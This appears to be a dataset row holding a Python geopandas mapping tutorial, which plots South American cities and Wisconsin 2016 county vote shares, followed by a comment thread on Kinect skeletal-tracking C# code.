text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
Mapping in Python¶
Co-author
Prerequisites
Outcomes
Use geopandas to create maps
# Uncomment following line to install on colab #! pip install fiona geopandas xgboost gensim folium pyLDAvis descartes
import geopandas as gpd import matplotlib.pyplot as plt import pandas as pd from shapely.geometry import Point %matplotlib inline
Mapping in Python¶
In this lecture, we will use a new package,
geopandas, to create maps.
Maps are really quite complicated… We are trying to project a spherical surface onto a flat figure, which is an inherently complicated endeavor.
Luckily,
geopandas will do most of the heavy lifting for us.
Let’s start with a DataFrame that has the latitude and longitude coordinates of various South American cities.
Our goal is to turn them into something we can plot – in this case, a
GeoDataFrame.
df = pd.DataFrame({ 'City': ['Buenos Aires', 'Brasilia', 'Santiago', 'Bogota', 'Caracas'], 'Country': ['Argentina', 'Brazil', 'Chile', 'Colombia', 'Venezuela'], 'Latitude': [-34.58, -15.78, -33.45, 4.60, 10.48], 'Longitude': [-58.66, -47.91, -70.66, -74.08, -66.86] })
In order to map the cities, we need tuples of coordinates.
We generate them by zipping the latitude and longitude together to store them in a new column named
Coordinates.
df["Coordinates"] = list(zip(df.Longitude, df.Latitude)) df.head()
Our next step is to turn the tuple into a
Shapely
Point object.
We will do this by applying Shapely’s
Point method to the
Coordinates column.
df["Coordinates"] = df["Coordinates"].apply(Point) df.head()
Finally, we will convert our DataFrame into a GeoDataFrame by calling the geopandas.DataFrame method.
Conveniently, a GeoDataFrame is a data structure with the convenience of a normal DataFrame but also an understanding of how to plot maps.
In the code below, we must specify the column that contains the geometry data.
See this excerpt from the docs.
gdf = gpd.GeoDataFrame(df, geometry="Coordinates") gdf.head()
# Doesn't look different than a vanilla DataFrame...let's make sure we have what we want print('gdf is of type:', type(gdf)) # And how can we tell which column is the geometry column? print('\nThe geometry column is:', gdf.geometry.name)
gdf is of type: <class 'geopandas.geodataframe.GeoDataFrame'> The geometry column is: Coordinates
Plotting a Map¶
Great, now we have our points in the GeoDataFrame.
Let’s plot the locations on a map.
This will require 3 steps
Get the map
Plot the map
Plot the points (our cities) on the map
1. Get the map¶
An organization called Natural Earth compiled the map data that we use here.
The file provides the outlines of countries, over which we’ll plot the city locations from our GeoDataFrame.
Luckily,
geopandas already comes bundled with this data, so we don’t
have to hunt it down!
# Grab low resolution world file world = gpd.read_file(gpd.datasets.get_path("naturalearth_lowres")) world = world.set_index("iso_a3") world.head()
world is a GeoDataFrame with the following columns:
pop_est: Contains a population estimate for the country
continent: The country’s continent
name: The country’s name
iso_a3: The country’s 3 letter abbreviation (we made this the index)
gdp_md_est: An estimate of country’s GDP
geometry: A
POLYGONfor each country (we will learn more about these soon)
world.geometry.name
'geometry'
Notice that the geometry for this GeoDataFrame is stored in the
geometry column.
A quick note about polygons
Instead of points (as our cities are), the geometry objects are now polygons.
A polygon is what you already likely think it is – a collection of ordered points connected by straight lines.
The smaller the distance between the points, the more readily the polygon can approximate non-linear shapes.
Let’s see an example of a polygon.
world.loc["ALB", 'geometry']
Notice that it displayed the country of Albania.
# Returns two arrays that hold the x and y coordinates of the points that define the polygon's exterior. x, y = world.loc["ALB", "geometry"].exterior.coords.xy # How many points? print('Points in the exterior of Albania:', len(x))
Points in the exterior of Albania: 24
Let’s see another
world.loc["AFG", "geometry"]
# Returns two arrays that hold the x and y coordinates of the points that define the polygon's exterior. x, y = world.loc["AFG", 'geometry'].exterior.coords.xy # How many points? print('Points in the exterior of Afghanistan:', len(x))
Points in the exterior of Afghanistan: 69
Notice that we’ve now displayed Afghanistan.
This is a more complex shape than Albania and thus required more points.
2. Plotting the map¶
fig, gax = plt.subplots(figsize=(10,10)) # By only plotting rows in which the continent is 'South America' we only plot SA. world.query("continent == 'South America'").plot(ax=gax, edgecolor='black',color='white') # By the way, if you haven't read the book 'longitude' by Dava Sobel, you should... gax.set_xlabel('longitude') gax.set_ylabel('latitude') gax.spines['top'].set_visible(False) gax.spines['right'].set_visible(False) plt.show()
Creating this map may have been easier than you expected!
In reality, a lot of heavy lifting is going on behind the scenes.
Entire university classes (and even majors!) focus on the theory and thought
that goes into creating maps, but, for now, we are happy to rely on the work done by the
experts behind
geopandas and its related libraries.
3. Plot the cities¶
In the code below, we run the same commands as before to plot the South American countries, but
, now, we also plot the data in
gdf, which contains the location of South American cities.
#') gax.spines['top'].set_visible(False) gax.spines['right'].set_visible(False) plt.show()
Adding labels to points.
Finally, we might want to consider annotating the cities so we know which cities are which.
#') # Kill the spines... gax.spines['top'].set_visible(False) gax.spines['right'].set_visible(False) # ...or get rid of all the axis. Is it important to know the lat and long? # plt.axis('off') # Label the cities for x, y, label in zip(gdf['Coordinates'].x, gdf['Coordinates'].y, gdf['City']): gax.annotate(label, xy=(x,y), xytext=(4,4), textcoords='offset points') plt.show()
Case Study: Voting in Wisconsin¶
In the example that follows, we will demonstrate how each county in Wisconsin voted during the 2016 Presidential Election.
Along the way, we will learn a couple of valuable lessons:
Where to find shape files for US states and counties
How to match census style data to shape files
Find and Plot State Border¶
Our first step will be to find the border for the state of interest. This can be found on the US Census’s website here.
You can download the
cb_2016_us_state_5m.zip by hand, or simply allow
geopandas to extract
the relevant information from the zip file online.
state_df = gpd.read_file("") state_df.head()
print(state_df.columns)
Index(['STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER', 'geometry'], dtype='object')
We have various columns, but, most importantly, we can find the right geometry by filtering by name.
fig, gax = plt.subplots(figsize=(10, 10)) state_df.query("NAME == 'Wisconsin'").plot(ax=gax, edgecolor="black", color="white") plt.show()
Find and Plot County Borders¶
Next, we will add the county borders to our map.
The county shape files (for the entire US) can be found on the Census site.
Once again, we will use the 5m resolution.
county_df = gpd.read_file("") county_df.head()
print(county_df.columns)
Index(['STATEFP', 'COUNTYFP', 'COUNTYNS', 'AFFGEOID', 'GEOID', 'NAME', 'LSAD', 'ALAND', 'AWATER', 'geometry'], dtype='object')
Wisconsin’s FIPS code is 55 so we will make sure that we only keep those counties.
county_df = county_df.query("STATEFP == '55'")
Now we can plot all counties in Wisconsin.
fig, gax = plt.subplots(figsize=(10, 10)) state_df.query("NAME == 'Wisconsin'").plot(ax=gax, edgecolor="black", color="white") county_df.plot(ax=gax, edgecolor="black", color="white") plt.show()
Get Vote Data¶
The final step is to get the vote data, which can be found online on this site.
Our friend Kim says,
Go ahead and open up the file. It’s a mess! I saved a cleaned up version of the file to
results.csvwhich we can use to save the hassle with cleaning the data. For fun, you should load the raw data and try beating it into shape. That’s what you normally would have to do… and it’s fun.
We’d like to add that such an exercise is also “good for you” (similar to how vegetables are good for you).
But, for the example in class, we’ll simply start with his cleaned data.
results = pd.read_csv("", thousands=",") results.head()
Notice that this is NOT a GeoDataFrame; it has no geographical information.
But it does have the names of each county.
We will be able to use this to match to the counties from
county_df.
First, we need to finish up the data cleaning.
results["county"] = results["county"].str.title() results["county"] = results["county"].str.strip() county_df["NAME"] = county_df["NAME"].str.title() county_df["NAME"] = county_df["NAME"].str.strip()
Then, we can merge election results with the county data.
res_w_states = county_df.merge(results, left_on="NAME", right_on="county", how="inner")
Next, we’ll create a new variable called
trump_share, which will denote the percentage of votes that
Donald Trump won during the election.
res_w_states["trump_share"] = res_w_states["trump"] / (res_w_states["total"]) res_w_states["rel_trump_share"] = res_w_states["trump"] / (res_w_states["trump"]+res_w_states["clinton"]) res_w_states.head()
Finally, we can create our map.
fig, gax = plt.subplots(figsize = (10,8)) # Plot the state state_df[state_df['NAME'] == 'Wisconsin'].plot(ax = gax, edgecolor='black',color='white') # Plot the counties and pass 'rel_trump_share' as the data to color res_w_states.plot( ax=gax, edgecolor='black', column='rel_trump_share', legend=True, cmap='RdBu_r', vmin=0.2, vmax=0.8 ) # Add text to let people know what we are plotting gax.annotate('Republican vote share',xy=(0.76, 0.06), xycoords='figure fraction') # I don't want the axis with long and lat plt.axis('off') plt.show()
What do you see from this map?
How many counties did Trump win? How many did Clinton win?
res_w_states.eval("trump > clinton").sum()
60
res_w_states.eval("clinton > trump").sum()
12
Who had more votes? Do you think a comparison in counties won or votes won is more reasonable? Why do you think they diverge?
res_w_states["trump"].sum()
1405284
res_w_states["clinton"].sum()
1382536
What story could you tell about this divergence?
Interactivity¶
Multiple Python libraries can help create interactive figures.
Here, we will see an example using bokeh.
In the another lecture, we will see an example with folium.
from bokeh.io import output_notebook from bokeh.plotting import figure, ColumnDataSource from bokeh.io import output_notebook, show, output_file from bokeh.plotting import figure from bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar, HoverTool from bokeh.palettes import brewer output_notebook() import json res_w_states["clinton_share"] = res_w_states["clinton"] / res_w_states["total"] #Convert data to geojson for bokeh wi_geojson=GeoJSONDataSource(geojson=res_w_states.to_json())
color_mapper = LinearColorMapper(palette = brewer['RdBu'][10], low = 0, high = 1) color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8,width = 500, height = 20, border_line_color=None,location = (0,0), orientation = 'horizontal') hover = HoverTool(tooltips = [ ('County','@county'),('Portion Trump', '@trump_share'), ('Portion Clinton','@clinton_share'), ('Total','@total')]) p = figure(title="Wisconsin Voting in 2016 Presidential Election", tools=[hover]) p.patches("xs","ys",source=wi_geojson, fill_color = {'field' :'rel_trump_share', 'transform' : color_mapper}) p.add_layout(color_bar, 'below') show(p) | https://datascience.quantecon.org/applications/maps.html | CC-MAIN-2022-40 | refinedweb | 1,863 | 50.94 |
Skeletal Tracking Fundamentals
- Posted: Feb 01, 2012 at 5:46 AM
- 92,218 Views
- 90 Comments
Something went wrong getting user information from Channel 9
Something went wrong getting user information from MSDN
Something went wrong getting the Visual Studio Achievements
Right click “Save as…”
In the skeletal tracking Quickstart series video, we'll discuss:!.
@myChan:Try adding a break point only when Tracking State = Tracked. I don't understand how the scaledJoint value could ever be set to a HipJoint if there is no TrackingState. Can you post the code that you're using and we'll see if we can't figure out what's going on?
!
@myChan: Just so I understand the problem, when you put a breakpoint in the ScalePosition method, and before you execute the method, the value of Joint is a HipCenter and it's position is not tracked?
@Dan:Definitely. Can you explain why this happens? I can`t find the reason.. Thanks!
I solve the problem. Thanks for your help!
So I followed your tutorial and cannot get the ScaleTo method to recognize for the Joint. Any idea why? I went and downloaded the sample code, but still cannot get it to work. What did you do myChan?
@Dan:
hi...i just wondering how doing the hover button with SDK V1?
refer link:
anyone knows?
need help. thanks
@Blas: Maybe I think, You should check the GetCameraPoint() method. To scale the position of skeleton, CameraPosition() method must be commented. And After you uncomment the ScaledPosition() method in sensor_AllFrameReady event, You can get a right result!
hi!
@myChan:
thanks! problem solved.
hmm...but how about the hover a button to select/click a target?
I tried that but nothing. I have your code exactly, its just the one line in line 180 where you call the joint.ScaleTo(1280, 720) method. It isn't recognizing the ScaleTo method even though I just downloaded this: But its still not working for me. Where is the ScaleTo method in Joint?
..
@kendrick0772: Maybe You can get a inspration in here. Check this out.
@myChan Well I can't do that...like I said I get an error with the scaleTo Method that it does not exist. Where is it? Where can I find it? Why does that error not show up in his code?
Never mind it works fine now!
Hello. I have problems with speed. You can find all details at
Do you have a solution?
Are there any sample code in C++ to get the X, Y, Z coordinate of the joints?
If I wanted to add images to the Camera and interact with them, how would I be able to detect if my either hands are touching the image? I tried using the PointToScreen method but I do not think this will work. Any ideas?
Hello Dan,
I have the same question as Mattia De Rosa.
"
Just to summarize is it possible to capture the hand gestures of a person seated behind a desk?
Thanks,
Vijay
@myChan:
how are u?
thanks for the reply!!! wonderful!
hmmm, i got questions to ask!
in the latest sdk v1.
how to make the cursor move no matter u are using left/right hand?
any sample code for that?
anyone knows?
thanks in advance!
Thanks for the tutorial!
Using sensor.SkeletonStream.Enable() (no 'smoothing' parameters then) I still have a significative delay. Can I further improve the response?
Or maybe it is a problem with my not-so-efficient laptop?
Thanks in advance ;)
Hi Dan,
Thanks a lot for your support with these tutorials, they are helpful. I trying to generate an aplication but I need to detect the pixel color, do you know how to do that?.
Thanks,
Regards.
Hi Dan,
For my application I would really like to be able to scale the joint distance but I can't get the ScaleTo method to recognize for the Joint.
It's this line I'm having trouble with:
Joint scaledJoint = joint.ScaleTo(1280, 720);
ScaleTo is not recognized. Is it because I'm missing a library or something of the sort?
Thanks,
Cheers!
Paola
Good news, we just recently announced on the Kinect SDK 1.5 that will allow seated skeletal tracking! You can read the full blog post here, but the most relevant part to your question is this:!
Yes, check out the C++ Skeletal Viewer example that ships in the SDK. You an filter by language and select just C++ samples in the Kinect for Windows SDK Sample Browser app that ships with the SDK.
Cheers,
-Dan
Hmm, for a baseline, can you try running the Kinect Explorer app and seeing what the Frames Per Second (FPS) number you get is? The FPS number is located under the depth camera in that sample.
Yes, in the Camera Fundamentals video we show how to get all of the pixels into a byte array (snippet below)
You can loop through the colors in that byte array to get the colors for each pixel. At a high level, the array is structured so that the data returned for the first point (0,0) and has four bytes representing the pixel color in the BGR32 format (BGR = Blue, Green, Red, Empty).
Hope this helps,
-Dan
Yes, make sure you have a reference to the c4ftoolkit project in the list of references for the project. If you don't, it is available in the dependencies folder of the Quickstarts download or available here -
Hi Dan,
Is it possible to limit the tracking to just one skeleton, so that when two or more skeletons appear in front of the kinect, only the skeleton which is recognized first is continued to be tracked? Thanks!
Hello Dan
Is it possible to get the skeleton coordinates given just a depth image. There is no Kinect involved.
Hey help plz :) how to get how many skeletons count in frame
Apr 02, 2012 at 12:01 PM
Hi Dan,
Is it possible to limit the tracking to just one skeleton, so that when two or more skeletons appear in front of the kinect, only the skeleton which is recognized first is continued to be tracked? Thanks!
[/quote]
Yes, the API you'll want to use is SkeletonStream.ChooseSkeletons() which takes one (to track one) or two integers representing which players you want to use for skeletal tracking. The other thing you'll want to do is decide how you want to choose which skeleton you should track. You can do this in a number of ways based on your app, you may need to be a certain distance from the Kinect, so you can get the distance of each player and remove any players not at the correct distance, or you can, similar to Xbox games, have a menu to select the player where the person playing raises their hand over their head and you loop through setting the tracked skeletons (check 1 & 2, check 3&4, check 5&6) and see which of the six skeletons have their hand joint above their head joint.
Hope this helps,
-Dan
@Mindaugas:
The current API will always return an array of six skeletons, even if there is only one person in the room. You will know which of the six is an actual person by checking the TrackingState of the skeleton.
Sir this tutotial is really very helpful, what i wanted to ask is that how we can perform the button click function using the Hand Gesture.
Plz guide me about it....
Instead of using a built-in button, I'd suggest instead building your own button control. We have an example user control of this on under WPF/Controls/HoverButton.
Hope this helps, - Dan
Can you plz upload a tutorial on how to use this control in an app?
Hi,
Does anyone know how what is the maximum distance a person could be from kinect and still be picked by skeleton tracking?
@Pramod: Find the detailed answer on the dept video =)
If I remember well it should be 1 to 4 meters for the xbox 360 kinect (default mode)
and 0.5 meters to 3 meters for the kinect for windows who has near mode enable.
Check the video out
@Myra: Try using Ray Chambers video to guide you in the process. It helped me.
Hi @Dan
Have you ever tried making this app using navigation windows in wpf? I tried but for some reason it doesn't work.
@ Dan
Hallo Dan,
i have an important question. I'm a student, and we work this time on a Kinect projekt. Your Videos are great and give a good introduction in programing with kinect.
I have a problem in the Skeleton Tracking Projekt. If switch the ColorViewer to autosize and maximize the Window, the Elipse on Hands are not longer on the right Position. Can you tell me how i make my app resizable?
SKELETON TRACKING PROBLEM
Hi, I've tried the demo you provide, and I've got problems with the 'skelate tracking". actually the exemple is not working well, I've even tried to copy the complete code, but it still not working. and by checking variable using brake point, ( first, allSkeletons, ...) it appears skeletons are not tracked.
Does anyone no the reason why or has n idea ?
Thank you in advance
near
SOLVED
Hello
I want to track Hip Joints for 6 skeletons. Can anyone help with the code?
Hey, I need a bit of help here. Bear with me, I'm very new to C#. The video kind of jumps straight to the code. I just have a problem setting the ellipses. They don't move. I don't know how to bind them properly. How do you get the ellipses to move after you create them??
@Dan
Thanks a lot for that awesome Tutorial. I have been trying to apply it in my project but i kept receiving this warning which says "Warning: An ImageFrame instance was not Disposed." I am sure that i disposed all the frames that I created. Can you please help ?!
Here is my;
using Coding4Fun.Kinect.Wpf;
using System.Diagnostics;
using System.IO;
namespace KinectSkeleton
{
/// <summary>
/// Interaction logic for MainWindow.xaml
/// </summary>
public partial class MainWindow : Window
{
public MainWindow()
{
InitializeComponent();
}
bool closing = false;
const int skeletonCount = 6;
Skeleton[] allSkeletons = new Skeleton[skeletonCount];
private void Window_Loaded(object sender, RoutedEventArgs e)
{
myKinectSensorChooser.KinectSensorChanged += new DependencyPropertyChangedEventHandler(myKinectSensorChooser_KinectSensorChanged);
}
void myKinectSensorChooser_KinectSensorChanged(object sender, DependencyPropertyChangedEventArgs e)
{
KinectSensor oldSensor = (KinectSensor)e.OldValue;
if (oldSensor != null)
{
oldSensor.Stop();
oldSensor.AudioSource.Stop();
}
KinectSensor mySensor = (KinectSensor)e.NewValue;
if (mySensor == null)
return;
mySensor.DepthStream.Enable(DepthImageFormat.Resolution320x240Fps30);
mySensor.ColorStream.Enable();
mySensor.SkeletonStream.Enable();
mySensor.AllFramesReady += new EventHandler<AllFramesReadyEventArgs>(mySensor_AllFramesReady);
try
{
mySensor.Start();
Debug.WriteLine("Starting Sensor .....");
Debug.WriteLine("The Current Elevation Angle is: " + mySensor.ElevationAngle.ToString());
mySensor.ElevationAngle = 0;
}
catch (System.IO.IOException)
{
//another app is using Kinect
myKinectSensorChooser.AppConflictOccurred();
}
}
void mySensor_AllFramesReady(object sender, AllFramesReadyEventArgs e)
{
if (closing)
return;
byte[] depthImagePixels;
DepthImageFrame depthFrame = e.OpenDepthImageFrame();
if (depthFrame == null)
return;
depthImagePixels = GenerateDepthImage(depthFrame);
int stride = depthFrame.Width*4;
image1.Source =
BitmapSource.Create(depthFrame.Width, depthFrame.Height,
96, 96, PixelFormats.Bgr32, null, depthImagePixels, stride);
//Get a skeleton
Skeleton first = GetFirstSkeleton(e);
if (first == null)
return;
Debug.WriteLine("Head Position is : " + first.Joints[JointType.Head].ToString());
depthFrame.Dispose();
}
private byte[] GenerateDepthImage(DepthImageFrame depthFrame)
{
//get the raw data from the frame with the depth for every pixel
short[] rawDepthData = new short[depthFrame.PixelDataLength];
depthFrame.CopyPixelDataTo(rawDepthData);
//use frame to create the image to display on-screen
//frame contains color information for all pixels in image
//Height x Width x 4 (Red, Green, Blue, empty byte)
Byte[] pixels = new byte[depthFrame.Height * depthFrame.Width * 4];
//hardcoded locations to Blue, Green, Red (BGR) index positions
const int BlueIndex = 0;
const int GreenIndex = 1;
const int RedIndex = 2;
int player, depth;
//loop through all distances
//pick a RGB color based on distance
for (int depthIndex = 0, colorIndex = 0;
depthIndex < rawDepthData.Length && colorIndex < pixels.Length;
depthIndex++, colorIndex += 4)
{
//get the player (requires skeleton tracking enabled for values)
player = rawDepthData[depthIndex] & DepthImageFrame.PlayerIndexBitmask;
//gets the depth value
depth = rawDepthData[depthIndex] >> DepthImageFrame.PlayerIndexBitmaskWidth;
if (player > 0)
{
pixels[colorIndex + BlueIndex] = Colors.Gold.B;
pixels[colorIndex + GreenIndex] = Colors.Gold.G;
pixels[colorIndex + RedIndex] = Colors.Gold.R;
}
else
{
pixels[colorIndex + BlueIndex] = Colors.Green.B;
pixels[colorIndex + GreenIndex] = Colors.Green.G;
pixels[colorIndex + RedIndex] = Colors.Green.R;
}
}
return pixels;
}
Skeleton GetFirstSkeleton(AllFramesReadyEventArgs e)
{
using (SkeletonFrame skeletonFrameData = e.OpenSkeletonFrame())
{
if (skeletonFrameData == null)
{
return null;
}
skeletonFrameData.CopySkeletonDataTo(allSkeletons);
//get the first tracked skeleton
Skeleton first = (from s in allSkeletons
where s.TrackingState == SkeletonTrackingState.Tracked
select s).FirstOrDefault();
return first;
}
}
void StopKinect(KinectSensor sensor)
{
if (sensor != null)
{
if (sensor.IsRunning)
{
sensor.ElevationAngle = 0;
sensor.Stop();
if (sensor.AudioSource != null)
{
sensor.AudioSource.Stop();
}
}
}
}
private void Window_Closing(object sender, System.ComponentModel.CancelEventArgs e)
{
closing = true;
Debug.WriteLine("Closing window...");
StopKinect(myKinectSensorChooser.Kinect);
}
}
}
Hi,@Dan.
I am a student from Tsing Hua University, China. I've been following you tutorial these days. The first four sections went great. However, when I came to the fifth one, which is the Skeletal Tracking Fundamentals, a problem emerged.
I believe I had exactly followed your steps and codes showed in the video, but it just didn't work out. I mean the Image control and the two ellipses I had set on the MainWindow didn't follow my joints, that is my head and two hands as you have specified in the video.
Here is my code as you may want to check it out.
bool closing=false;
const int skeletonCount=6;
Skeleton[] allSkeletons=new Skeleton[skeletonCount];
private void Window_Loaded(object sender, RoutedEventArgs e)
{
kinectSensorChooser1.KinectSensorChanged += new DependencyPropertyChangedEventHandler(kinectSensorChooser1_KinectSensorChanged);
}
void kinectSensorChooser1_KinectSensorChanged(object sender, DependencyPropertyChangedEventArgs e)
{
KinectSensor oldSensor = (KinectSensor)e.OldValue;
StopKinect(oldSensor);
KinectSensor newSensor = (KinectSensor)e.NewValue;();
}
}
void newSensor_AllFramesReady(object sender, AllFramesReadyEventArgs e)
{
if(closing)
{
return;
}
Skeleton first=GetFirstSkeleton(e);
if(first==null)
{
return;
}
GetCameraPoint(first,e);
}
void GetCameraPoint(Skeleton first,AllFramesReadyEventArgs e)
{
using(DepthImageFrame depth=e.OpenDepthImageFrame())
{
if(depth==null||kinectSensorChooser1.Kinect==null)
{
return;
}
DepthImagePoint headDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.Head].Position);
DepthImagePoint leftDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.HandLeft].Position);
DepthImagePoint rightDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.HandRight].Position);
ColorImagePoint headColorPoint=
depth.MapToColorImagePoint(headDepthPoint.X,headDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
ColorImagePoint leftColorPoint=
depth.MapToColorImagePoint(leftDepthPoint.X,leftDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
ColorImagePoint rightColorPoint=
depth.MapToColorImagePoint(rightDepthPoint.X,rightDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
CameraPosition(headImage, headColorPoint);
CameraPosition(leftellipse, leftColorPoint);
CameraPosition(rightellipse, rightColorPoint);
}
}
private void CameraPosition(FrameworkElement element, ColorImagePoint point)
{
Canvas.SetLeft(element,point.X-element.Width/2);
Canvas.SetTop(element,point.Y-element.Height/2);
}
Skeleton GetFirstSkeleton(AllFramesReadyEventArgs e)
{
using(SkeletonFrame skeletonFrameData =e.OpenSkeletonFrame())
{
if(skeletonFrameData==null)
{
return null;
}
skeletonFrameData.CopySkeletonDataTo(allSkeletons);
Skeleton first=(from s in allSkeletons
where s.TrackingState==SkeletonTrackingState.Tracked
select s).FirstOrDefault();
return first;
}
}
void StopKinect(KinectSensor sensor)
{
if(sensor!=null)
{
sensor.Stop();
sensor.AudioSource.Stop();
}
}
private void Window_Closing(object sender, System.ComponentModel.CancelEventArgs e)
{
StopKinect(kinectSensorChooser1 .Kinect);
}
private void SetTilt_Click(object sender, RoutedEventArgs e)
{
SetTilt.IsEnabled = false;
if (kinectSensorChooser1.Kinect != null && kinectSensorChooser1.Kinect.IsRunning)
{
kinectSensorChooser1.Kinect.ElevationAngle = (int)slider1.Value;
}
System.Threading.Thread.Sleep(new TimeSpan(hours:0,minutes:0,seconds:1));
SetTilt.IsEnabled = true;
}
private void slider1_ValueChanged(object sender, RoutedPropertyChangedEventArgs<double> e)
{
}
I was wondering if you could help me a little bit. And I would be so grateful.
@Adila & @kinjad: I had a similar problem and it was resolved by removing all 'HorizontalAlignment' and 'VerticalAlignment' properties from the elements you are wanting to move.
Hope that helps,
Hi Dan..
When i try to run my code, which basically tracks my right hand, and ellipses appear on my shoulder, hand and elbow joints, i get an error like this, while running:
"NullReferenceException was unhandled". , on this line of code:
Skeleton skeleton= (from s in allSkeletons where s.TrackingState == SkeletonTrackingState.Tracked select s).FirstOrDefault();
The Bold part on the above line is where the error is highlighted in my code.
Can you help me with this, coz i'm kinda stuck with this for days now..
Thanks in Advance..
The reason this is null is because there is *no* skeleton (or null skeleton) when the app first starts up. What you want to do is do nothing if there is no skeleton.
if (skeleton == null)
{ return; }
hi,
can any1 mail me or upload the code(c++ in opencv) for gesture recognition using kinect.
here is mail id
vikas.mulage@gmail.com
@Vikas Meet me tom
Hi Dan...,
I just went through tutorial its awesome!!,
i'm just working on Real time Motion Retargeting into 3D model using Kinect,i'm unable to proceed after skeleton data extraction,please help me out regarding further steps
Thanks,
Regards>
Hi Dan...,
It would be possible with the tool box do a mob cauter or a crwd couter?
associate face images to a square?
Would not use the skeleton, but as you associate the image to the face .. and an algorithm to count the squares!
Can you help me implement this?
something like this video:
thanx
Art
Hello Dan,
I am trying to control a Drone with the kinect. Do i use the skeleton and depth data for that?
I am running out of time . please help.
Hi Dan,
The sample code runs perfectly on my computer; however, when exiting the application, an exception happened on line 177 of KinectSkeletonViewer.xaml.cs where the line reads "ColorImagePoint colorPoint = depthFrame.MapToColorImagePoint(depthPoint.X, depthPoint.Y, this.Kinect.ColorStream.Format);".
The warning message is shown as "InvalidOperationException was unhandled
This API has returned an exception from an HRESULT: 0x80070015".
You may want to try the latest release of Kinect (1.5.2) as I think this should be fixed.
Hi Dan,
Awesome! Thanks for the video.
I've try out the skeleton tracking (full body) and it work well for the standing/vertical position. However, when I try to do a bit of the exercise in which requires lying down and the skeleton in more of a horizontal position the tracking does not work well. May I check with you if the there is anyway to work around this problem ? or would there be a release in the future of the sdk that would incorporate this lying down/horizontal skeleton tracking features.
Please help.
Thanks,
Viet
@Dan: but I go here and the SDK is still 1.5, the toolkit is the one that have been updated. I'm getting the same "InvalidOperationException was unhandled This API has returned an exception from an HRESULT: 0x80070015" and don't really know what to do, cause it's related to the SkeletonViewer.
If I delete that viewer from the mainWindow.xaml, that message doesn't appear (not even at closing the window), but that means that I cannot render the Skeletons on Screen automatically.
Any ideas? Thanks.
Hello!
I have a question.
I've built the demo like that above. But when I've put ellipses for joints on canvas and run the project, ellipses did't appeared in front of color picture. Instead they are in background - not visible. What I did wrong?
Thank you for the answer.
@Dan: I am trying to use the design editor for the main window of the Visual Basic code sample, but i am getting Invalid Markup error. No changes to original code was made. Using KSDK 1.0
THanks!
@Perry and @juanpibanez
I have a solution to the "InvalidOperationException was unhandled This API has returned an exception from an HRESULT: 0x80070015" and I figured I would post for any future readers.
I installed version 1.6 of the SDK and the Toolkit (Kinect for Windows) to no avail. After this, I opened the KinectSkeletonViewer.xaml.cs and noticed some function were now obsolete. To make the fix, change the following:
Line 172 - 181
//******************
CoordinateMapper cm = new CoordinateMapper(this.Kinect);
DepthImagePoint depthPoint = cm.MapSkeletonPointToDepthPoint(skeletonPoint, depthFrame.Format);
switch (ImageType)
{
case ImageType.Color:
ColorImagePoint colorPoint = new ColorImagePoint();
if (this.Kinect != null && this.Kinect.IsRunning)
colorPoint = cm.MapDepthPointToColorPoint(depthFrame.Format, depthPoint, this.Kinect.ColorStream.Format);
// map back to skeleton.Width & skeleton.Height
//******************
Once I updated these operations to the revised functions, I no longer receive the error. Hope this helps!
I used the QuickStart sample code for skeletal tracking and have the latest SDK, but I dont understand why the headImage does not follow my movements. The ellipses follow my hand motions. Why is it when I run it, I can get the ellipses to work, but the headImage automatically goes to the top left corner of the window and doesn't follow my head motions?
I was partially able to solve the problem. All 3 joints in the code are now tracking and objects moving, but I changed the headImage image object to an ellipse object in the .xaml window. The question now is why the headImage image object did not work but the ellipse object works.
I really like your videos, they have been very helpful to me. I want to save a movement (x, y, z) and then compare this with another movement (x, y, z) in real time, the idea is that the user will try to mimic the movement saved, and the system makes a calculation to find out how similar (0% ~ 100%) the motions are. My current problem is that the skeleton from the recorded movement is different of the skeleton that is trying to mimic the movement, I'm trying to work with the idea of a standardized skeleton you have any suggestions on how I can record and compare data in a standardized way?
Hi,
I tried to follow the video. Everything compiles, but the ellipses and image are not well mapped in the window. I checked CameraPosition and I do have the same calculation for the "SetLeft" and "SetTop".
Also, I am unable to download the sample code.
Thanks for helping
The download link of the source files is dead:(
Can you fix this?
DL Link:
.
@SkiRacerDude Thank you:)
Hi Channel 9, this is really a beautiful series that you put up.
Hi I was just wondering if you have your videos transcribed somewhere for download? I really appreciate the tips I'm learning but English is not my native language, so sometimes the presenter speak a bit too fast for me to follow. Would really appreciate a text version of these tutorials.
Keep up the good work. Thank you very much.
@Basvm: Welcome
Dear Sir
Im working on kinect, i have some questions
1- hip center, hip_left and hip_right . what does represent exactly in the body, hip its not a point its a part consist of 3 items in the body,
please tell me what excatly represent in the body?
2- for depth data, it gives only distance between object and kinect, if i have object 3d like cube , for points in the z-axis it also retuen this points or just points in front of kinect?
3- if i need to track points that doesnt exist in the available joints , can i add other joints/points or not?
Warning 1 'Microsoft.Kinect.DepthImageFrame.MapFromSkeletonPoint(Microsoft.Kinect.SkeletonPoint)' is obsolete: 'This method is replaced by Microsoft.Kinect.CoordinateMapper.MapSkeletonPointToDepthPoint'
depth.MapFromSkeletonPoint(first.Joints[JointType.Head].Position);
this is the line that it say it obsolete.
anyone know how to fix this problem.
Hi,
trying to run the sample code and came up with a problem :
the line "using Microsoft.Kinect;" has a red line under Kinect. the program is runing, but a build error is showing before. anyone knows how can I make this red line under the Kinect to disapear?
hiiii
how can i do when Hover button by hand skeleton and the command load image to tracking spine skeleton in c#?
thanksssssss
Thanks for great tutorial.
One thing: how to set the image with transparent background? I tried to do so, but the backgroud is always white.
Hi Dan,
Really helpful tutorial. Helps me a lot.
